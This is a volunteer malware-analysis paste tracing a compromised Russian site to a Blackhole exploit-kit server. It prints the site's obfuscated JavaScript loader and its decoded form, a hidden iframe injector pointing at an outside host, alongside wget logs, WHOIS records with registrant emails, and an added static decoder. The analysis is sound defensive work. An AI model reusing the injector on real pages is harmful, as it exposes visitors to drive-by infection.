- =======================================
- MalwareMustDie - Happy New Year Case-2
- A huge infector found at the archive.f1online.su server
- Uses an iframe implemented in a hijacked service that got suspended..
- Leads to the blackhole infector server
- ======================================
- // The domain DNS info:
- domain: F1ONLINE.SU
- nserver: ns1.ns64.com.
- nserver: ns2.ns64.com.
- state: REGISTERED, DELEGATED
- person: Private Person
- e-mail: hanprokiller@yandex.ru
- registrar: RUCENTER-REG-FID
- created: 2010.03.16
- paid-till: 2013.03.16
- free-date: 2013.04.18
- source: TCI
- Last updated on 2013.01.02 15:51:35 MSK
- // infector list, source: spam...
- // server dns info:
- archive.f1online.su. 3600 IN A 194.28.132.130
- archive.f1online.su
- origin = ns1.ns64.com
- mail addr = webmaster.archive.f1online.su
- serial = 1
- refresh = 10800
- retry = 3600
- expire = 604800
- minimum = 3600
- // Let's check why it got infected, and with what.
- // Took some samples; they lead to the same redirection...
- // PoC:
- h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
- // finding out the reason why....grab it..
- --20:03:25-- h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
- => `index.php@s=96f14a35edf55e062c1a613186b6a8e8'
- Resolving archive.f1online.su... seconds 0.00, 194.28.132.130
- Caching archive.f1online.su => 194.28.132.130
- Connecting to archive.f1online.su|194.28.132.130|:80... seconds 0.00, connected.
- GET /index.php?s=96f14a35edf55e062c1a613186b6a8e8 HTTP/1.0
- User-Agent: #MalwareMustDie - Wishing you a terrible 2013 year!
- Accept: */*
- Host: archive.f1online.su
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- HTTP/1.1 200 OK
- Server: nginx
- Date: Wed, 02 Jan 2013 11:03:21 GMT
- Content-Type: text/html; charset=utf-8
- Connection: close
- X-Powered-By: PHP/5.2.14
- Set-Cookie: session_id=baf0913e29b2023470b4ed83bf5f1f9f; path=/; httponly
- Content-Language: ru
- 200 OK
- Length: unspecified [text/html]
- 20:03:30 (92.29 KB/s) - `index.php@s=96f14a35edf55e062c1a613186b6a8e8' saved [261760]
- // Found this obfuscated code; the question is "is it malicious?" We'll see.
- try{window.document.body=window.document.body}catch(dgsgsdg){zxc=1;}try{if(window.document)window["doc"+"ument"]["body"]=window.document}catch(bawetawe)
- {if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber)
- {if("".substr)ev=eval;}}
- n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39",
- "3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e",
- "1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g",
- "41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m",
- "4f","4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24",
- "1d","42","4e","3m","49","41","4f","2b","23","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e",
- "1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c",
- "4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29",
- "1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45",
- "42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o",
- "4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g",
- "4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m","4f",
- "4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24","1d",
- "42","4e","3m","49","41","4f","2b","23","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b",
- "1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f",
- "4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48",
- "41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g",
- "44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44",
- "4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a",
- "4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h",
- "44","45","48","40","1f","42","1g","29","d","9","9","50"];
- h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(window.document)ev(""+z)}}}
- // In short, the de-obfuscation result:
- if (document.getElementsByTagName('body')[0]){
-     iframer();
- }
- else {
-     document.write("<iframe src='http://inmediasys.com/feed/frames.php?uid=56&frames=5' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
- }
- function iframer(){
-     var f = document.createElement('iframe');
-     f.setAttribute('src', 'http://inmediasys.com/feed/frames.php?uid=56&frames=5');
-     f.style.visibility = 'hidden';
-     f.style.position = 'absolute';
-     f.style.left = '0';
-     f.style.top = '0';
-     f.setAttribute('width', '10');
-     f.setAttribute('height', '10');
-     document.getElementsByTagName('body')[0].appendChild(f);
- }
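// Added example (not part of the original paste): a static decoder for the loader above, which stores one character code per array token in radix 25 and rebuilds the script with parseInt + String.fromCharCode.
// Nothing is eval'd. The function names and the a.invalid sample host are assumptions made for this illustration.

```javascript
// Added example, not from the original paste. Static decode only.

// Locate the quoted token array and the radix passed to parseInt().
function extractEncoded(scriptText) {
  const arr = /\[\s*((?:"[0-9a-z]{1,4}"[\s,]*)+)\]/i.exec(scriptText);
  const rad = /parseInt\s*\(\s*[^,()]+,\s*(\d+)\s*\)/.exec(scriptText);
  if (!arr || !rad) return null;
  const radix = Number(rad[1]);
  if (radix < 2 || radix > 36) return null; // parseInt only supports 2..36
  return { tokens: arr[1].match(/[0-9a-z]+/gi), radix };
}

// Same arithmetic as the loader: one character code per token.
function decodeTokens(tokens, radix) {
  return tokens.map((t) => {
    const code = parseInt(t, radix);
    if (Number.isNaN(code)) throw new Error('token not valid in radix ' + radix + ': ' + t);
    return String.fromCharCode(code);
  }).join('');
}

// Collect src targets from the decoded text, defanged in the paste's h00p style.
function iframeSources(js) {
  const re = /(?:\bsrc\s*=\s*|setAttribute\(\s*['"]src['"]\s*,\s*)['"]([^'"]+)['"]/g;
  const found = new Set();
  for (const m of js.matchAll(re)) found.add(m[1].replace(/^http/i, 'h00p'));
  return [...found];
}

function analyze(scriptText) {
  const enc = extractEncoded(scriptText);
  if (!enc) return null;
  const decoded = decodeTokens(enc.tokens, enc.radix);
  return { radix: enc.radix, decoded, sources: iframeSources(decoded) };
}

// Constructed sample shaped like the loader in the paste (placeholder host a.invalid).
const SAMPLE = 'n=["42","1l","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m",' +
  '"3m","1l","45","4a","4i","3m","48","45","40","1m","1e","29"];' +
  's="";for(i=0;i<n.length;i++){s+=String.fromCharCode(parseInt(n[i],25));}';

console.log(analyze(SAMPLE));
```

// Feeding the saved index.php body to analyze() yields the decoded script and its iframe targets without running it in a browser.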
- // try to fetch this....
- --20:08:48-- http://inmediasys.com/feed/frames.php?uid=56&frames=5
- => `frames.php@uid=56&frames=5'
- Resolving inmediasys.com... seconds 0.00, failed: Unknown host.
- // seek further....
- Domain Name: INMEDIASYS.COM
- Registrant:
- N/A
- Joanie Kenny (joanie_kenny601@startrekmail.com)
- Clara Van St
- Austin
- TX,78734
- US
- Tel. +1.0898265608
- Creation Date: 20-Nov-2012
- Expiration Date: 20-Nov-2013
- Domain servers in listed order:
- ns1.suspended-domain.com
- ns2.suspended-domain.com
// Domain is down, looks suspended... The question is still unanswered: WHY?
//
// The evidence is the URL below:
// http://inmediasys.com/feed/frames.php?uid=56&frames=5
// Let's make sure: check every DB for URLs with a similar pattern...
// Found in:
// Urlquery:
// http://193.107.85.36/report.php?id=209160
// We found a similar URL:
// http://inmediasys.com/feed/xml.php?98679407&uid=56
// It has the recorded HTTP headers of the communication sent:
- GET /feed/xml.php?98679407&uid=56 HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://inmediasys.com/feed/frames.php?uid=56&frames=5
// The reply is below:
- HTTP/1.1 200 OK
- Content-Type: text/html; charset=utf-8
- Server: nginx
- Date: Thu, 22 Nov 2012 16:39:35 GMT
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.3.16-1~dotdeb.0
- Cache-Control: no-store, no-cache, must-revalidate
- Content-Encoding: gzip
// It's a Blackhole-implemented infector.
// Now we know why it is evil:
// an IFRAME used in an evil way.
// The good thing is that the domains are blocked, except the infector used.
// Someone must inform f1online.su about the cleanup.
- ----
- #MalwareMustDie
- [0x00000000]> !date
- Wed Jan 2 20:48:05 JST 2013